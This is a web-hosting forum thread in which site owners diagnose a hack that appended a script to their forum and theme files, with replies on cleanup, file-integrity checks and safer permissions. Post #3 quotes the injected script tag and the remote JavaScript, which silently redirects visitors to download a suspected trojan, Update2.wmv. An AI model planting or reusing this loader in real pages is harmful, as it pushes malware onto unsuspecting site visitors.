Results 1 to 11 of 11

Thread: possible forum hijack

  1. #1

    Join Date
    Nov 2001
    Location
    Virginia Beach, VA
    Posts
    78
    Rep Power
    16
    Hello,

    I have had a few repor5ts from forum members at www.comandosupremo.com/forum of a media file named update2.wmv popping up on the forum for download. The media file would also show a picture of elephant. I have never put this file in the forum and I believe it may be some type of virus or trojan.

    I have also noticed my tropic_anywhere.php no longer works on www.comandosupremo.com. This seemed to quit working around teh same time the forum experienced trouble.

    Here is the code for the javascript:
    <script language="JavaScript" type="text/javascript" src="http://www.comandosupremo.com/forum/topics_anywhere.php?mode=show&f=a&n=5&r=y&b=squ&lp b=0&lpd=0&lpi=y"></script

    Any help would be most appreciated!

    Jim

  2. #2
    mod_rewrite Mirzabah's Avatar
    Join Date
    Apr 2002
    Location
    Melbourne, Australia
    Posts
    2,038
    Rep Power
    19
    I can confirm that when I visited your site, it tried to download a file called update2.wmv - without me asking for it. This only happened the first time - subsequent re-loads didn't do anything out of the ordinarey . If you haven't already done so, I would strongly recommend changing your FTP and MySQL passwords and upgrading to the latest version of phpBB.

  3. #3
    satis's Avatar
    Join Date
    Oct 2002
    Location
    Dallas
    Posts
    2,914
    Rep Power
    20
    I got it too. at the top of the main forum page is this line

    PHP Code:
    <script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script> 
    I pulled up that page, which shows the following
    PHP Code:
    <!--
        var 
    currentDate = new Date();
        var 
    adRecurrence "daily";
        var 
    adId "a1087804322";
        var 
    adExpiration 0;
        var 
    retry=2;
        var 
    flag 0;
        var 
    obj=null;
            
    currentDate.setTime(currentDate.getTime() + (1*36*60*60*1000));
            
    adExpiration currentDate.toGMTString();
        function 
    SetCookie(sNamesValuesExpire){
            var 
    expireCode "";
            if (
    sExpire) { expireCode =  "expires=" sExpire ";" }
            
    document.cookie sName "=" escape(sValue) + ";" expireCode
        
    }


        function 
    GetCookie(sName) {
            var 
    aCookie document.cookie.split("; ");
            for (var 
    i=0aCookie.lengthi++) {
                var 
    aCrumb aCookie[i].split("=");
                if (
    sName == aCrumb[0]) { return unescape(aCrumb[1]); }
            }
            return 
    null;
        }

        function 
    upop() {
              
    setTimeout("location.href = 'http://www.dlfree.com/Update2.wmv'",1000);
        }


        if (!
    GetCookie(adId)) {
            
    SetCookie(adId,"1"adExpiration);
                                    
    setTimeout("upop()",10*1000);

        }
    //--> 
    obviously that's the source of the popup. The question is, is this something you added to your forum? If so...just un-add it and you'll probably be fine. If not, then at least one of your forum files has been edited, which is typically a BAD sign. If someone was able to alter one of your files, there's no telling what else they might have done. At a minimum, check your user list and make sure there aren't any new admins you don't know about, and change your password.

  4. #4
    dvoges
    Guest

    update2.wmf site hijack

    I have likewise been hijacked at http://stringersystems.com This is a PostNuke site using Xanthia themes.

    I found that all the files in the active theme folder had been touched on 23Nov05 and the script appended.

  5. #5
    satis's Avatar
    Join Date
    Oct 2002
    Location
    Dallas
    Posts
    2,914
    Rep Power
    20
    ah, the files were appended? If that's the case, I'd consider your forum, site, and database compromised. I would highly recommend you audit your user tables, as well as upgrade to the latest release of your forum and/or postnuke versions. Not a happy occurence, I'm sure, but I've been through a similar procedure and it's not horribly complex. Much better than not knowing if someone else owns your website now. Be sure to change all your login information for anything that matters.

  6. #6
    linnetwoods's Avatar
    Join Date
    Apr 2003
    Location
    Everywhere! Currently Mallorca, Balearic Islands
    Posts
    1,470
    Rep Power
    16
    Is there some sort of script that one can use to check for changes just before making any oneself, to see if someone else has done so? i.e. After you finished making changes on your site, you would run the script to update it, so it knew what should be there. It would tell you what changes it had found and you would OK them. Then, before making the next set of changes, you woud run the script again, to see whether it reported any changes that had been made (by someone else, obviously) since your last session. At that point you would need the option to see the changes and maybe even get some info on how hey got there and the option to undo all changes made since the last official update... Does it exist? Could it be created by someone who understands these mysteries that escape us ordinary web-manglers?
    The pen is mightier than the sword. Except when the other guy has the sword
    LinnetWoods.com

  7. #7
    Former Spam Filter (EU) IanS's Avatar
    Join Date
    Mar 2004
    Location
    Washington (THE original UK one!)
    Posts
    12,964
    Rep Power
    30
    A bit like the md5 system (now defunct) for passing ISO images. The problem I see with this is that although the scripts won't change, with blogs and other dynamic data around the hash totals would also change unless you could specify the files to include (or exclude).
    This is a Powweb customer
    helping Powweb customer forum.

    I am a customer just like you!!

    Some matters can only be answered by staff or support.
    Give it a go - ask here first!

  8. #8
    satis's Avatar
    Join Date
    Oct 2002
    Location
    Dallas
    Posts
    2,914
    Rep Power
    20
    you could do it with md5. MD5 still works, it's just 'hackable'. For something like a checksum hash I'm sure it'd still be useful.

    You could probably set up a php page with cron job...have it fopen all the files, stuff all the contents into an md5, then store the hash somewhere (like a db table or a flat file). Actually, a db table would be great...one row per day per file or something. Then have it compare the previous day's hashes with the current days and raise a warning if they're difference.

    As long as you're doing it on the static background php pages (and not cached templates or anything truly dynamic) that'd be a great way to do it. Good idea IanS. Now to trick Extras or someone into coding it. hehe.

  9. #9
    on hiatus
    Join Date
    Mar 2004
    Location
    Canada
    Posts
    5,815
    Rep Power
    0
    Quote Originally Posted by satis
    Now to trick Extras or someone into coding it. hehe.
    I will not write something like that.
    It's not effective.

    I mean, it only tries to detect already cracked situation, and it's too late.
    Also, it's going to be extremely heavy, some people will abuse it and harm everyone.

    It's better to detect, bad permission setting (666, 777, ...),
    unsafe scripts, and other vulnerabilities BEFORE being cracked.

    But I don't think I will write that either, as it's going to be a heavy script
    (although not as heavy as checking md5 or CRC), and people who needs them
    will abuse the script, most probably.


    The real problem is, let's say, the lack of education.
    Constructing safe site is easy.

    The ten commandments for safer web site (for PowWeb users)
    1. Use safer permission setting of 710 instead of 755 for all directories.
    2. Use even safer permission of 700 for directories not directly accessed by Apache.
    3. Use 750 only for directories you want to use Apache's default directory listing.

    4. Use safer permission of 600 instead of 640 for ALL PHP scripts.
    5. Use safer permission of 700 instead of 755 for ALL CGI scripts.

    6. Password protect ALL scripts other than you want general public to access,
    including webstats provided by PowWeb.

    7. Avoid using unsafe scripts: Matt's Formmail.pl, phpBB2, php-Nuke,
    and many other PHP and CGI scripts. I guess 90% of cracking happens this way.

    Remember that PHP is a vulnerable, buggy, and risky languages
    and scripts written with it are often very vulnerable, buggy and risky.

    Static contents require much less maintenance and a lot safer,
    and can be as cool as stupid CMS/BLOG construction.

    8. Check the IP of last access for OPS, FTP, and mail, regularly.
    9. Check your raw log to see suspicious access and cracking attempts.

    10. Keep your PC safe. If your PC is compromised, bad people can obtain
    access to your site and many many personal information.

    DO NOT trust BIG corporation, like MS, SONY, and so on.
    These guys often create stupid products, but they can be clever in deceiving naive users.

    Stay away from hyped, fancy, needless, or heavy features.
    Stay away from IE/OE, html mail, Javascript, and so on.
    Now, I think what we need is something to replace PHP and its badly written apps.
    PHP is a cancer of shared hosting in terms of security and resource usage.
    (On dedicated server or VPS, it's not as bad.)

    Some PHP users are dreaming that Ruby on Rails will be the savior, but I don't think so.
    It's still too heavy and apps will be written by same PHP coders who have been
    writing unsafe inefficient scripts that the end result will be similar.

    I've experimented OCaml and found it pretty fast and small.
    And I will write replacement Form mailer and simple CMS with it, probably.


    The main problem is the ignorance, again.
    People are not aware of how much they are suffering from bad hype around PHP,
    just like they are suffering from unsafe MS products such as IE/OE.

    And I don't foresee any change in this area very soon, unfortunately.
    I've been telling this many times in this forum.
    Yet most people are still using unsafe permission and vulnerable scripts without protection.
    It's nearly "normal" and inevitable to get cracked.

  10. #10
    linnetwoods's Avatar
    Join Date
    Apr 2003
    Location
    Everywhere! Currently Mallorca, Balearic Islands
    Posts
    1,470
    Rep Power
    16
    I know nothing about anything but I came to the conclusion (borne out by a quick glance at the proportion of threads with problems on php on this very forum!) that I should forget trying to use php or MySQL and stick with the simplicity of html, when building some shops for a client. He is really pleased with the results, everything works and the shops are unique instead of being very much like a zillion others. We used PayPal as they have now decided that people can pay by credit card without having to join.

    I can see that for a forum or chat room there is probably no alternative but shops and galleries can be made in html without too much slog and they aren't bug-ridden.
    The pen is mightier than the sword. Except when the other guy has the sword
    LinnetWoods.com

  11. #11
    on hiatus
    Join Date
    Mar 2004
    Location
    Canada
    Posts
    5,815
    Rep Power
    0
    I wrote a small script that checks unsafe permission, and correct them.

    To use, install extratools.php (automatic installer)
    http://check-these.info/tools/extratools_php.txt

    Then, click on "Install/Update 666.cgi".
    When installation is finished, click on the link "666.cgi" or "Run 666.cgi".

    This will prevent at least simple cracking done via directory with unsafe permission,
    like some people in this thread have suffered.

    Note:
    If you have a site with lots of files, it may timeout.
    It's a slow script, and it won't cause resource abuse, AFAIK.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •